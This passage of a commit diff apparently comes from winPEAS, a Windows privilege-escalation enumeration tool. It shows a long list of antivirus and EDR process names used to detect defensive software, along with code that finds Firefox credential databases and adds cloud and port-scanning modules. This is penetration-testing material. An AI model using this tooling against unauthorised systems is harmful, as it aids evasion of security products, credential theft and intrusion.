{"ave32.exe" , ""}, { "Sophos Anti-Virus", new HashSet<string>() { "sav32cli.exe", "savprogress.exe", "savservice.exe", "native.exe", "swi_di.exe", "backgroundscanclient.exe", "savmain.exe", "forceupdatealongsidesgn.exe", "swc_service.exe", "savproxy.exe", "savcleanupservice.exe", "savadminservice.exe", } },
{"avgcc32.exe" , ""}, { "Symantec Endpoint Protection", new HashSet<string>() { "ccsvchst.exe", } },
{"avgctrl.exe" , ""}, { "Symantec", new HashSet<string>() { "sepwscsvc64.exe", } },
{"avgemc.exe" , ""}, { "Total Defense Anti-Virus", new HashSet<string>() { "caoscheck.exe", "ccprovsp.exe", "caschelp.exe", "caisstutorial.exe", "ccwatcher.exe", "cawsc.exe", "ccevtmgr.exe", "ccprovep.exe", "casc.exe", "cclogconfig.exe", "ccschedulersvc.exe", "cckasubmit.exe", "ccproxysrvc.exe", "caunst.exe", } },
{"avgnt.exe" , ""}, { "Trend micro", new HashSet<string>() { "uiwinmgr.exe", "ntrtscan.exe", "tmntsrv.exe", "pccpfw.exe", } },
{"avgrsx.exe" , ""}, { "VIPRE Advanced Security by ThreatTrack Security", new HashSet<string>() { "sbamtray.exe", "sbamwsc.exe", "sbamcommandlinescanner.exe", "sbamcreaterestore.exe", "sbamsvc.exe", "avcproxy.exe", "sbbd.exe", } },
{"avgserv.exe" , ""}, { "VIPRE Antivirus by GFI Software", new HashSet<string>() { "sbamtray.exe", "sbsetupdrivers.exe", "sbamsafemodeui.exe", "sbpimsvc.exe", "sbamwsc.exe", "sbrc.exe", "sfe.exe", "sbagentdiagnostictool.exe", "sbamcommandlinescanner.exe", "sbamsvc.exe", "sbamcreaterestore.exe", "sbamui.exe", } },
{"avgserv9.exe" , ""}, { "ViRobot Anti-Ransomware by HAURI", new HashSet<string>() { "vrbbdsvc.exe", "uninstall.exe", "vrbbdlogviewer.exe", "vrbbdbackup.exe", "vrpuller.exe", } },
{"avguard.exe" , ""}, { "ViRobot Internet Security 2011 by HAURI", new HashSet<string>() { "hvrpcuselock.exe", "hvrlogview.exe", "hvreasyrobot.exe", "hvrsetup.exe", "hvrfilewipe.exe", "hvrmalsvc.exe", "hvrtrafficviewer.exe", "hvrscan.exe", "hvrcontain.exe", "hvrquarantview.exe", "hvrtray.exe", } },
{"avgwdsvc.exe" , ""}, { "Webroot", new HashSet<string>() { "wrsa.exe", } },
{"avgui.exe" , ""}, { "Windows defender", new HashSet<string>() { "msmpeng.exe", "mpcmdrun.exe", "msascuil.exe", "windefend.exe", "msascui.exe", "msmpsvc.exe", } },
{"avgw.exe" , ""}, { "Zillya Internet Security by ALLIT Service", new HashSet<string>() { "drvcmd.exe", "ziscore.exe", "keyboard.exe", "systemresearchtool.exe", "zis.exe", "zisnet.exe", "conscan.exe", "zisupdater.exe", "zisaux.exe", "ziships.exe", } },
{"avkpop.exe" , ""}, { "Zillya! Antivirus by ALLIT Service", new HashSet<string>() { "wscmgr.exe", "drvcmd.exe", "zillya.exe", "zavaux.exe", "reporter.exe", "autoruntool.exe", "taskmanagertool.exe", } },
{"avkserv.exe" , ""}, { "Zillya! Internet Security by ALLIT Service", new HashSet<string>() { "restoretool.exe", "drvcmd.exe", "wscmgr.exe", "zefcore.exe", "zefsvc.exe", "fwdisabler.exe", "zefaux.exe", "backuphostfile.exe", "conscanner.exe", "reporter.exe", "autoruntool.exe", "zef.exe", "taskmanagertool.exe", } },
{"avkservice.exe" , ""}, { "ZoneAlarm Anti-Ransomware by Check Point Software", new HashSet<string>() { "zup.exe", "consrvhost.exe", "zaarupdateservice.exe", "zaar.exe", "sbacipollasrvhost.exe", "uninst.exe", } },
{"avkwctl9.exe" , ""}, { "ZoneAlarm Antivirus by Check Point, Inc", new HashSet<string>() { "threatemulation.exe", "multiscan.exe", "restoreutility.exe", "vsmon.exe", "zatray.exe", "multifix.exe", } },
{"avltmain.exe" , ""}, { "ZoneAlarm by Check Point, Inc", new HashSet<string>() { "instmtdr.exe", "zatutor.exe", "cpes_clean.exe", "multiscan.exe", "zauninst.exe", "zlclient.exe", "multifix.exe", } }
{"avnt.exe" , ""},
{"avp.exe" , ""},
{"avp32.exe" , ""},
{"avpcc.exe" , ""},
{"avpdos32.exe" , ""},
{"avpm.exe" , ""},
{"avptc32.exe" , ""},
{"avpupd.exe" , ""},
{"avsched32.exe" , ""},
{"avsynmgr.exe" , ""},
{"avwin.exe" , ""},
{"avwin95.exe" , ""},
{"avwinnt.exe" , ""},
{"avwupd.exe" , ""},
{"avwupd32.exe" , ""},
{"avwupsrv.exe" , ""},
{"avxmonitor9x.exe" , ""},
{"avxmonitornt.exe" , ""},
{"avxquar.exe" , ""},
{"backweb.exe" , ""},
{"bargains.exe" , ""},
{"bd_professional.exe" , ""},
{"beagle.exe" , ""},
{"belt.exe" , ""},
{"bidef.exe" , ""},
{"bidserver.exe" , ""},
{"bipcp.exe" , ""},
{"bipcpevalsetup.exe" , ""},
{"bisp.exe" , ""},
{"blackd.exe" , ""},
{"blackice.exe" , ""},
{"blink.exe" , ""},
{"blss.exe" , ""},
{"bootconf.exe" , ""},
{"bootwarn.exe" , ""},
{"borg2.exe" , ""},
{"bpc.exe" , ""},
{"brasil.exe" , ""},
{"bs120.exe" , ""},
{"bundle.exe" , ""},
{"bvt.exe" , ""},
{"ccapp.exe" , ""},
{"ccevtmgr.exe" , ""},
{"ccpxysvc.exe" , ""},
{"ccSvcHst.exe" , ""},
{"cdp.exe" , ""},
{"cfd.exe" , ""},
{"cfgwiz.exe" , ""},
{"cfiadmin.exe" , ""},
{"cfiaudit.exe" , ""},
{"cfinet.exe" , ""},
{"cfinet32.exe" , ""},
{"claw95.exe" , ""},
{"claw95cf.exe" , ""},
{"clean.exe" , ""},
{"cleaner.exe" , ""},
{"cleaner3.exe" , ""},
{"cleanpc.exe" , ""},
{"cleanup.exe" , ""},
{"click.exe" , ""},
{"cmdagent.exe" , ""},
{"cmesys.exe" , ""},
{"cmgrdian.exe" , ""},
{"cmon016.exe" , ""},
{"connectionmonitor.exe" , ""},
{"cpd.exe" , ""},
{"cpf9x206.exe" , ""},
{"cpfnt206.exe" , ""},
{"ctrl.exe" , ""},
{"cv.exe" , ""},
{"cwnb181.exe" , ""},
{"cwntdwmo.exe" , ""},
{"CylanceUI.exe" , ""},
{"CyProtect.exe" , ""},
{"CyUpdate.exe" , ""},
{"cyserver.exe" , ""},
{"cytray.exe" , ""},
{"CyveraService.exe" , ""},
{"datemanager.exe" , ""},
{"dcomx.exe" , ""},
{"defalert.exe" , ""},
{"defscangui.exe" , ""},
{"defwatch.exe" , ""},
{"deputy.exe" , ""},
{"divx.exe" , ""},
{"dgprompt.exe" , ""},
{"DgService.exe" , ""},
{"dllcache.exe" , ""},
{"dllreg.exe" , ""},
{"doors.exe" , ""},
{"dpf.exe" , ""},
{"dpfsetup.exe" , ""},
{"dpps2.exe" , ""},
{"drwatson.exe" , ""},
{"drweb32.exe" , ""},
{"drwebupw.exe" , ""},
{"dssagent.exe" , ""},
{"dumpcap.exe" , ""},
{"dvp95.exe" , ""},
{"dvp95_0.exe" , ""},
{"ecengine.exe" , ""},
{"efpeadm.exe" , ""},
{"egui.exe" , ""},
{"ekrn.exe" , ""},
{"emet_agent.exe" , ""},
{"emet_service.exe" , ""},
{"emsw.exe" , ""},
{"engineserver.exe" , ""},
{"ent.exe" , ""},
{"esafe.exe" , ""},
{"escanhnt.exe" , ""},
{"escanv95.exe" , ""},
{"espwatch.exe" , ""},
{"ethereal.exe" , ""},
{"etrustcipe.exe" , ""},
{"evpn.exe" , ""},
{"exantivirus-cnet.exe" , ""},
{"exe.avxw.exe" , ""},
{"expert.exe" , ""},
{"explore.exe" , ""},
{"f-agnt95.exe" , ""},
{"f-prot.exe" , ""},
{"f-prot95.exe" , ""},
{"f-stopw.exe" , ""},
{"fameh32.exe" , ""},
{"fast.exe" , ""},
{"fch32.exe" , ""},
{"fcagswd.exe" , "McAfee DLP Agent"},
{"fcags.exe" , "McAfee DLP Agent"},
{"fih32.exe" , ""},
{"findviru.exe" , ""},
{"firesvc.exe" , "McAfee Host Intrusion Prevention"},
{"firetray.exe" , ""},
{"firewall.exe" , ""},
{"fnrb32.exe" , ""},
{"fp-win.exe" , ""},
{"fp-win_trial.exe" , ""},
{"fprot.exe" , ""},
{"frameworkservice.exe" , ""},
{"frminst.exe" , ""},
{"frw.exe" , ""},
{"fsaa.exe" , ""},
{"fsav.exe" , ""},
{"fsav32.exe" , ""},
{"fsav530stbyb.exe" , ""},
{"fsav530wtbyb.exe" , ""},
{"fsav95.exe" , ""},
{"fsgk32.exe" , ""},
{"fsm32.exe" , ""},
{"fsma32.exe" , ""},
{"fsmb32.exe" , ""},
{"gator.exe" , ""},
{"gbmenu.exe" , ""},
{"gbpoll.exe" , ""},
{"generics.exe" , ""},
{"gmt.exe" , ""},
{"guard.exe" , ""},
{"guarddog.exe" , ""},
{"hacktracersetup.exe" , ""},
{"hbinst.exe" , ""},
{"hbsrv.exe" , ""},
{"HijackThis.exe" , ""},
{"hipsvc.exe" , ""},
{"HipMgmt.exe" , "McAfee Host Intrusion Protection"},
{"hotactio.exe" , ""},
{"hotpatch.exe" , ""},
{"htlog.exe" , ""},
{"htpatch.exe" , ""},
{"hwpe.exe" , ""},
{"hxdl.exe" , ""},
{"hxiul.exe" , ""},
{"iamapp.exe" , ""},
{"iamserv.exe" , ""},
{"iamstats.exe" , ""},
{"ibmasn.exe" , ""},
{"ibmavsp.exe" , ""},
{"icload95.exe" , ""},
{"icloadnt.exe" , ""},
{"icmon.exe" , ""},
{"icsupp95.exe" , ""},
{"icsuppnt.exe" , ""},
{"idle.exe" , ""},
{"iedll.exe" , ""},
{"iedriver.exe" , ""},
{"iface.exe" , ""},
{"ifw2000.exe" , ""},
{"inetlnfo.exe" , ""},
{"infus.exe" , ""},
{"infwin.exe" , ""},
{"init.exe" , ""},
{"intdel.exe" , ""},
{"intren.exe" , ""},
{"iomon98.exe" , ""},
{"istsvc.exe" , ""},
{"jammer.exe" , ""},
{"jdbgmrg.exe" , ""},
{"jedi.exe" , ""},
{"kavlite40eng.exe" , ""},
{"kavpers40eng.exe" , ""},
{"kavpf.exe" , ""},
{"kazza.exe" , ""},
{"keenvalue.exe" , ""},
{"kerio-pf-213-en-win.exe" , ""},
{"kerio-wrl-421-en-win.exe" , ""},
{"kerio-wrp-421-en-win.exe" , ""},
{"kernel32.exe" , ""},
{"KeyPass.exe" , ""},
{"killprocesssetup161.exe" , ""},
{"launcher.exe" , ""},
{"ldnetmon.exe" , ""},
{"ldpro.exe" , ""},
{"ldpromenu.exe" , ""},
{"ldscan.exe" , ""},
{"lnetinfo.exe" , ""},
{"loader.exe" , ""},
{"localnet.exe" , ""},
{"lockdown.exe" , ""},
{"lockdown2000.exe" , ""},
{"lookout.exe" , ""},
{"lordpe.exe" , ""},
{"lsetup.exe" , ""},
{"luall.exe" , ""},
{"luau.exe" , ""},
{"lucomserver.exe" , ""},
{"luinit.exe" , ""},
{"luspt.exe" , ""},
{"mapisvc32.exe" , ""},
{"masvc.exe" , "McAfee Agent"},
{"mbamservice.exe" , ""},
{"mcafeefire.exe" , ""},
{"mcagent.exe" , ""},
{"mcmnhdlr.exe" , ""},
{"mcscript.exe" , ""},
{"mcscript_inuse.exe" , ""},
{"mctool.exe" , ""},
{"mctray.exe" , ""},
{"mcupdate.exe" , ""},
{"mcvsrte.exe" , ""},
{"mcvsshld.exe" , ""},
{"md.exe" , ""},
{"mfeann.exe" , "McAfee VirusScan Enterprise"},
{"mfemactl.exe" , "McAfee VirusScan Enterprise"},
{"mfevtps.exe" , ""},
{"mfin32.exe" , ""},
{"mfw2en.exe" , ""},
{"mfweng3.02d30.exe" , ""},
{"mgavrtcl.exe" , ""},
{"mgavrte.exe" , ""},
{"mghtml.exe" , ""},
{"mgui.exe" , ""},
{"minilog.exe" , ""},
{"minionhost.exe" , ""},
{"mmod.exe" , ""},
{"monitor.exe" , ""},
{"moolive.exe" , ""},
{"mostat.exe" , ""},
{"mpfagent.exe" , ""},
{"mpfservice.exe" , ""},
{"mpftray.exe" , ""},
{"mrflux.exe" , ""},
{"msapp.exe" , ""},
{"msbb.exe" , ""},
{"msblast.exe" , ""},
{"mscache.exe" , ""},
{"msccn32.exe" , ""},
{"mscman.exe" , ""},
{"msconfig.exe" , ""},
{"msdm.exe" , ""},
{"msdos.exe" , ""},
{"msiexec16.exe" , ""},
{"msinfo32.exe" , ""},
{"mslaugh.exe" , ""},
{"msmgt.exe" , ""},
{"msmsgri32.exe" , ""},
{"MsSense.exe" , "Microsoft Defender ATP"},
{"mssmmc32.exe" , ""},
{"mssys.exe" , ""},
{"msvxd.exe" , ""},
{"mu0311ad.exe" , ""},
{"mwatch.exe" , ""},
{"n32scanw.exe" , ""},
{"naprdmgr.exe" , ""},
{"nav.exe" , ""},
{"navap.navapsvc.exe" , ""},
{"navapsvc.exe" , ""},
{"navapw32.exe" , ""},
{"navdx.exe" , ""},
{"navlu32.exe" , ""},
{"navnt.exe" , ""},
{"navstub.exe" , ""},
{"navw32.exe" , ""},
{"navwnt.exe" , ""},
{"nc2000.exe" , ""},
{"ncinst4.exe" , ""},
{"ndd32.exe" , ""},
{"neomonitor.exe" , ""},
{"neowatchlog.exe" , ""},
{"netarmor.exe" , ""},
{"netd32.exe" , ""},
{"netinfo.exe" , ""},
{"netmon.exe" , ""},
{"netscanpro.exe" , ""},
{"netspyhunter-1.2.exe" , ""},
{"netstat.exe" , ""},
{"netutils.exe" , ""},
{"nisserv.exe" , ""},
{"nisum.exe" , ""},
{"nmain.exe" , ""},
{"nod32.exe" , ""},
{"normist.exe" , ""},
{"norton_internet_secu_3.0_407.exe" , ""},
{"notstart.exe" , ""},
{"npf40_tw_98_nt_me_2k.exe" , ""},
{"npfmessenger.exe" , ""},
{"nprotect.exe" , ""},
{"npscheck.exe" , ""},
{"npssvc.exe" , ""},
{"nsched32.exe" , ""},
{"nssys32.exe" , ""},
{"nstask32.exe" , ""},
{"nsupdate.exe" , ""},
{"nt.exe" , ""},
{"ntrtscan.exe" , ""},
{"ntvdm.exe" , ""},
{"ntxconfig.exe" , ""},
{"nui.exe" , ""},
{"nupgrade.exe" , ""},
{"nvarch16.exe" , ""},
{"nvc95.exe" , ""},
{"nvsvc32.exe" , ""},
{"nwinst4.exe" , ""},
{"nwservice.exe" , ""},
{"nwtool16.exe" , ""},
{"nxlog.exe" , ""},
{"ollydbg.exe" , ""},
{"onsrvr.exe" , ""},
{"optimize.exe" , ""},
{"ostronet.exe" , ""},
{"osqueryd.exe" , ""},
{"otfix.exe" , ""},
{"outpost.exe" , ""},
{"outpostinstall.exe" , ""},
{"outpostproinstall.exe" , ""},
{"padmin.exe" , ""},
{"panixk.exe" , ""},
{"patch.exe" , ""},
{"pavcl.exe" , ""},
{"pavproxy.exe" , ""},
{"pavsched.exe" , ""},
{"pavw.exe" , ""},
{"pccwin98.exe" , ""},
{"pcfwallicon.exe" , ""},
{"pcip10117_0.exe" , ""},
{"pcscan.exe" , ""},
{"pdsetup.exe" , ""},
{"periscope.exe" , ""},
{"persfw.exe" , ""},
{"perswf.exe" , ""},
{"pf2.exe" , ""},
{"pfwadmin.exe" , ""},
{"pgmonitr.exe" , ""},
{"pingscan.exe" , ""},
{"platin.exe" , ""},
{"pop3trap.exe" , ""},
{"poproxy.exe" , ""},
{"popscan.exe" , ""},
{"portdetective.exe" , ""},
{"portmonitor.exe" , ""},
{"powerscan.exe" , ""},
{"ppinupdt.exe" , ""},
{"pptbc.exe" , ""},
{"ppvstop.exe" , ""},
{"prizesurfer.exe" , ""},
{"prmt.exe" , ""},
{"prmvr.exe" , ""},
{"procdump.exe" , ""},
{"processmonitor.exe" , ""},
{"procexp.exe" , ""},
{"procexp64.exe" , ""},
{"procexplorerv1.0.exe" , ""},
{"procmon.exe" , ""},
{"programauditor.exe" , ""},
{"proport.exe" , ""},
{"protectx.exe" , ""},
{"pspf.exe" , ""},
{"purge.exe" , ""},
{"qconsole.exe" , ""},
{"qserver.exe" , ""},
{"rapapp.exe" , ""},
{"rav7.exe" , ""},
{"rav7win.exe" , ""},
{"rav8win32eng.exe" , ""},
{"ray.exe" , ""},
{"rb32.exe" , ""},
{"rcsync.exe" , ""},
{"realmon.exe" , ""},
{"reged.exe" , ""},
{"regedit.exe" , ""},
{"regedt32.exe" , ""},
{"rescue.exe" , ""},
{"rescue32.exe" , ""},
{"rrguard.exe" , ""},
{"rtvscan.exe" , ""},
{"rtvscn95.exe" , ""},
{"rulaunch.exe" , ""},
{"run32dll.exe" , ""},
{"rundll.exe" , ""},
{"rundll16.exe" , ""},
{"ruxdll32.exe" , ""},
{"safeweb.exe" , ""},
{"sahagent.exescan32.exe" , ""},
{"save.exe" , ""},
{"savenow.exe" , ""},
{"sbserv.exe" , ""},
{"scam32.exe" , ""},
{"scan32.exe" , ""},
{"scan95.exe" , ""},
{"scanpm.exe" , ""},
{"scrscan.exe" , ""},
{"SentinelOne.exe" , ""},
{"serv95.exe" , ""},
{"setupvameeval.exe" , ""},
{"setup_flowprotector_us.exe", ""},
{"sfc.exe" , ""},
{"sgssfw32.exe" , ""},
{"sh.exe" , ""},
{"shellspyinstall.exe" , ""},
{"shn.exe" , ""},
{"showbehind.exe" , ""},
{"shstat.exe" , "McAfee VirusScan Enterprise"},
{"SISIDSService.exe" , ""},
{"SISIPSUtil.exe" , ""},
{"smc.exe" , ""},
{"sms.exe" , ""},
{"smss32.exe" , ""},
{"soap.exe" , ""},
{"sofi.exe" , ""},
{"sperm.exe" , ""},
{"splunk.exe" , "Splunk"},
{"splunkd.exe" , "Splunk"},
{"splunk-admon.exe" , "Splunk"},
{"splunk-powershell.exe" , "Splunk"},
{"splunk-winevtlog.exe" , "Splunk"},
{"spf.exe" , ""},
{"sphinx.exe" , ""},
{"spoler.exe" , ""},
{"spoolcv.exe" , ""},
{"spoolsv32.exe" , ""},
{"spyxx.exe" , ""},
{"srexe.exe" , ""},
{"srng.exe" , ""},
{"ss3edit.exe" , ""},
{"ssgrate.exe" , ""},
{"ssg_4104.exe" , ""},
{"st2.exe" , ""},
{"start.exe" , ""},
{"stcloader.exe" , ""},
{"supftrl.exe" , ""},
{"support.exe" , ""},
{"supporter5.exe" , ""},
{"svchostc.exe" , ""},
{"svchosts.exe" , ""},
{"sweep95.exe" , ""},
{"sweepnet.sweepsrv.sys.swnetsup.exe", ""},
{"symproxysvc.exe" , ""},
{"symtray.exe" , ""},
{"sysedit.exe" , ""},
{"sysmon.exe" , "Sysinternals Sysmon"},
{"sysupd.exe" , ""},
{"TaniumClient.exe" , "Tanium"},
{"taskmg.exe" , ""},
{"taskmo.exe" , ""},
{"taumon.exe" , ""},
{"tbmon.exe" , ""},
{"tbscan.exe" , ""},
{"tc.exe" , ""},
{"tca.exe" , ""},
{"tcm.exe" , ""},
{"tcpview.exe" , ""},
{"tds-3.exe" , ""},
{"tds2-98.exe" , ""},
{"tds2-nt.exe" , ""},
{"teekids.exe" , ""},
{"tfak.exe" , ""},
{"tfak5.exe" , ""},
{"tgbob.exe" , ""},
{"titanin.exe" , ""},
{"titaninxp.exe" , ""},
{"tlaservice.exe" , ""},
{"tlaworker.exe" , ""},
{"tracert.exe" , ""},
{"trickler.exe" , ""},
{"trjscan.exe" , ""},
{"trjsetup.exe" , ""},
{"trojantrap3.exe" , ""},
{"tsadbot.exe" , ""},
{"tshark.exe" , ""},
{"tvmd.exe" , ""},
{"tvtmd.exe" , ""},
{"udaterui.exe" , ""},
{"undoboot.exe" , ""},
{"updat.exe" , ""},
{"update.exe" , ""},
{"updaterui.exe" , ""},
{"upgrad.exe" , ""},
{"utpost.exe" , ""},
{"vbcmserv.exe" , ""},
{"vbcons.exe" , ""},
{"vbust.exe" , ""},
{"vbwin9x.exe" , ""},
{"vbwinntw.exe" , ""},
{"vcsetup.exe" , ""},
{"vet32.exe" , ""},
{"vet95.exe" , ""},
{"vettray.exe" , ""},
{"vfsetup.exe" , ""},
{"vir-help.exe" , ""},
{"virusmdpersonalfirewall.exe", ""},
{"vnlan300.exe" , ""},
{"vnpc3000.exe" , ""},
{"vpc32.exe" , ""},
{"vpc42.exe" , ""},
{"vpfw30s.exe" , ""},
{"vptray.exe" , ""},
{"vscan40.exe" , ""},
{"vscenu6.02d30.exe" , ""},
{"vsched.exe" , ""},
{"vsecomr.exe" , ""},
{"vshwin32.exe" , ""},
{"vsisetup.exe" , ""},
{"vsmain.exe" , ""},
{"vsmon.exe" , ""},
{"vsstat.exe" , ""},
{"vstskmgr.exe" , "McAfee VirusScan Enterprise"},
{"vswin9xe.exe" , ""},
{"vswinntse.exe" , ""},
{"vswinperse.exe" , ""},
{"w32dsm89.exe" , ""},
{"w9x.exe" , ""},
{"watchdog.exe" , ""},
{"webdav.exe" , ""},
{"webscanx.exe" , ""},
{"webtrap.exe" , ""},
{"wfindv32.exe" , ""},
{"whoswatchingme.exe" , ""},
{"wimmun32.exe" , ""},
{"win-bugsfix.exe" , ""},
{"win32.exe" , ""},
{"win32us.exe" , ""},
{"winactive.exe" , ""},
{"window.exe" , ""},
{"windows.exe" , ""},
{"wininetd.exe" , ""},
{"wininitx.exe" , ""},
{"winlogin.exe" , ""},
{"winmain.exe" , ""},
{"winnet.exe" , ""},
{"winppr32.exe" , ""},
{"winrecon.exe" , ""},
{"winservn.exe" , ""},
{"winssk32.exe" , ""},
{"winstart.exe" , ""},
{"winstart001.exe" , ""},
{"wintsk32.exe" , ""},
{"winupdate.exe" , ""},
{"wireshark.exe" , ""},
{"wkufind.exe" , ""},
{"wnad.exe" , ""},
{"wnt.exe" , ""},
{"wradmin.exe" , ""},
{"wrctrl.exe" , ""},
{"wsbgate.exe" , ""},
{"wupdater.exe" , ""},
{"wupdt.exe" , ""},
{"wyvernworksfirewall.exe" , ""},
{"xagt.exe" , ""},
{"xpf202en.exe" , ""},
{"zapro.exe" , ""},
{"zapsetup3001.exe" , ""},
{"zatutor.exe" , ""},
/*{"zonalm2601" , ""}, These names (ending in .exe) are detected by AVs
{"zonealarm" , ""},
{"_avp32" , ""},
{"_avpcc" , ""},
{"rshell" , ""},
{"_avpms" , ""}*/
}; };
// reverse lookup list
public static Dictionary<string, HashSet<string>> AVVendorsByProcess = new Dictionary<string, HashSet<string>>();
static DefensiveProcesses()
{
// initialize the structure here
foreach (var kvp in Definitions)
{
var vendor = kvp.Key;
foreach (var executable in kvp.Value)
{
var sanitizedExecutable = executable.Trim().ToLower();
if (!AVVendorsByProcess.ContainsKey(sanitizedExecutable))
{
AVVendorsByProcess.Add(sanitizedExecutable, new HashSet<string>() { vendor });
}
else
{
AVVendorsByProcess[sanitizedExecutable].Add(vendor);
}
}
}
}
} }
} }

4
winPEAS/winPEASexe/winPEAS/Info/SystemInfo/SystemInfo.cs
View File

@ -133,7 +133,7 @@ namespace winPEAS.Info.SystemInfo
IPGlobalProperties properties = IPGlobalProperties.GetIPGlobalProperties(); IPGlobalProperties properties = IPGlobalProperties.GetIPGlobalProperties();
string dnsDomain = properties.DomainName; string dnsDomain = properties.DomainName;
const string query = "SELECT HotFixID FROM Win32_QuickFixEngineering"; const string query = "SELECT HotFixID,InstalledOn FROM Win32_QuickFixEngineering";
using (var search = new ManagementObjectSearcher(query)) using (var search = new ManagementObjectSearcher(query))
{ {
@ -142,7 +142,7 @@ namespace winPEAS.Info.SystemInfo
string hotfixes = ""; string hotfixes = "";
foreach (ManagementObject quickFix in collection) foreach (ManagementObject quickFix in collection)
{ {
hotfixes += quickFix["HotFixID"].ToString() + ", "; hotfixes += quickFix["HotFixID"] + " (" + quickFix["InstalledOn"] + "), ";
} }
results.Add("Hostname", strHostName); results.Add("Hostname", strHostName);

2
winPEAS/winPEASexe/winPEAS/KnownFileCreds/Browsers/Firefox/Firefox.cs
View File

@ -120,7 +120,7 @@ namespace winPEAS.KnownFileCreds.Browsers.Firefox
string firefoxCredentialFile4 = $"{directory}\\{"key4.db"}"; string firefoxCredentialFile4 = $"{directory}\\{"key4.db"}";
if (File.Exists(firefoxCredentialFile4)) if (File.Exists(firefoxCredentialFile4))
{ {
results.Add(firefoxCredentialFile4); results.Add(firefoxCredentialFile3);
} }
} }
} }

13
winPEAS/winPEASexe/winPEAS/winPEAS.csproj
View File

@ -118,6 +118,7 @@
<Reference Include="System.Core" /> <Reference Include="System.Core" />
<Reference Include="System.DirectoryServices.AccountManagement" /> <Reference Include="System.DirectoryServices.AccountManagement" />
<Reference Include="System.Management" /> <Reference Include="System.Management" />
<Reference Include="System.Net.Http" />
<Reference Include="System.Security" /> <Reference Include="System.Security" />
<Reference Include="System.ServiceProcess" /> <Reference Include="System.ServiceProcess" />
<Reference Include="System.Transactions" /> <Reference Include="System.Transactions" />
@ -1002,6 +1003,7 @@
<Compile Include="3rdParty\YamlSerializer\YamlTagValidator.cs" /> <Compile Include="3rdParty\YamlSerializer\YamlTagValidator.cs" />
<Compile Include="Checks\ApplicationsInfo.cs" /> <Compile Include="Checks\ApplicationsInfo.cs" />
<Compile Include="Checks\BrowserInfo.cs" /> <Compile Include="Checks\BrowserInfo.cs" />
<Compile Include="Checks\CloudInfo.cs" />
<Compile Include="Checks\FileAnalysis.cs" /> <Compile Include="Checks\FileAnalysis.cs" />
<Compile Include="Checks\FilesInfo.cs" /> <Compile Include="Checks\FilesInfo.cs" />
<Compile Include="Checks\Globals.cs" /> <Compile Include="Checks\Globals.cs" />
@ -1038,6 +1040,11 @@
<Compile Include="Info\ApplicationInfo\DeviceDrivers.cs" /> <Compile Include="Info\ApplicationInfo\DeviceDrivers.cs" />
<Compile Include="Info\ApplicationInfo\InstalledApps.cs" /> <Compile Include="Info\ApplicationInfo\InstalledApps.cs" />
<Compile Include="Helpers\Beaprint.cs" /> <Compile Include="Helpers\Beaprint.cs" />
<Compile Include="Info\CloudInfo\AWSInfo.cs" />
<Compile Include="Info\CloudInfo\AzureInfo.cs" />
<Compile Include="Info\CloudInfo\EndpointData.cs" />
<Compile Include="Info\CloudInfo\GCPInfo.cs" />
<Compile Include="Info\CloudInfo\CloudInfoBase.cs" />
<Compile Include="Info\EventsInfo\Logon\ExplicitLogonEventInfo.cs" /> <Compile Include="Info\EventsInfo\Logon\ExplicitLogonEventInfo.cs" />
<Compile Include="Info\EventsInfo\Logon\Logon.cs" /> <Compile Include="Info\EventsInfo\Logon\Logon.cs" />
<Compile Include="Info\EventsInfo\Logon\LogonEventInfo.cs" /> <Compile Include="Info\EventsInfo\Logon\LogonEventInfo.cs" />
@ -1058,7 +1065,7 @@
<Compile Include="Info\FilesInfo\Office\OfficeRecentFileInfo.cs" /> <Compile Include="Info\FilesInfo\Office\OfficeRecentFileInfo.cs" />
<Compile Include="Info\FilesInfo\Office\OneDrive\CloudSyncProviderInfo.cs" /> <Compile Include="Info\FilesInfo\Office\OneDrive\CloudSyncProviderInfo.cs" />
<Compile Include="Info\FilesInfo\Office\OneDrive\OneDriveSyncProviderInfo.cs" /> <Compile Include="Info\FilesInfo\Office\OneDrive\OneDriveSyncProviderInfo.cs" />
<Compile Include="Info\FilesInfo\WSL\WSL.cs" /> <Compile Include="Info\FilesInfo\WSL\WSLHelper.cs" />
<Compile Include="Info\NetworkInfo\Enums\IPVersion.cs" /> <Compile Include="Info\NetworkInfo\Enums\IPVersion.cs" />
<Compile Include="Info\NetworkInfo\Enums\MibTcpState.cs" /> <Compile Include="Info\NetworkInfo\Enums\MibTcpState.cs" />
<Compile Include="Info\NetworkInfo\Enums\Protocol.cs" /> <Compile Include="Info\NetworkInfo\Enums\Protocol.cs" />
@ -1068,6 +1075,10 @@
<Compile Include="Info\NetworkInfo\InternetSettings\InternetSettingsInfo.cs" /> <Compile Include="Info\NetworkInfo\InternetSettings\InternetSettingsInfo.cs" />
<Compile Include="Info\NetworkInfo\InternetSettings\InternetSettingsKey.cs" /> <Compile Include="Info\NetworkInfo\InternetSettings\InternetSettingsKey.cs" />
<Compile Include="Info\NetworkInfo\NetworkConnection.cs" /> <Compile Include="Info\NetworkInfo\NetworkConnection.cs" />
<Compile Include="Info\NetworkInfo\NetworkScanner\NetPinger.cs" />
<Compile Include="Info\NetworkInfo\NetworkScanner\NetworkUtils.cs" />
<Compile Include="Info\NetworkInfo\NetworkScanner\NetworkScanner.cs" />
<Compile Include="Info\NetworkInfo\NetworkScanner\PortScanner.cs" />
<Compile Include="Info\NetworkInfo\Structs\MIB_TCP6ROW_OWNER_PID.cs" /> <Compile Include="Info\NetworkInfo\Structs\MIB_TCP6ROW_OWNER_PID.cs" />
<Compile Include="Info\NetworkInfo\Structs\MIB_TCP6TABLE_OWNER_PID.cs" /> <Compile Include="Info\NetworkInfo\Structs\MIB_TCP6TABLE_OWNER_PID.cs" />
<Compile Include="Info\NetworkInfo\Structs\MIB_TCPROW_OWNER_PID.cs" /> <Compile Include="Info\NetworkInfo\Structs\MIB_TCPROW_OWNER_PID.cs" />

2
winPEAS/winPEASexe/winPEAS/winPEAS.csproj.user
View File

@ -5,7 +5,7 @@
</StartArguments> </StartArguments>
</PropertyGroup> </PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Debug|AnyCPU'"> <PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Debug|AnyCPU'">
<StartArguments>fileanalysis debug</StartArguments> <StartArguments>cloudinfo -network="auto" -ports="21,22,445"</StartArguments>
</PropertyGroup> </PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Debug|x64'"> <PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Debug|x64'">
<StartArguments>debug</StartArguments> <StartArguments>debug</StartArguments>

4
winPEAS/winPEASps1/README.md
View File

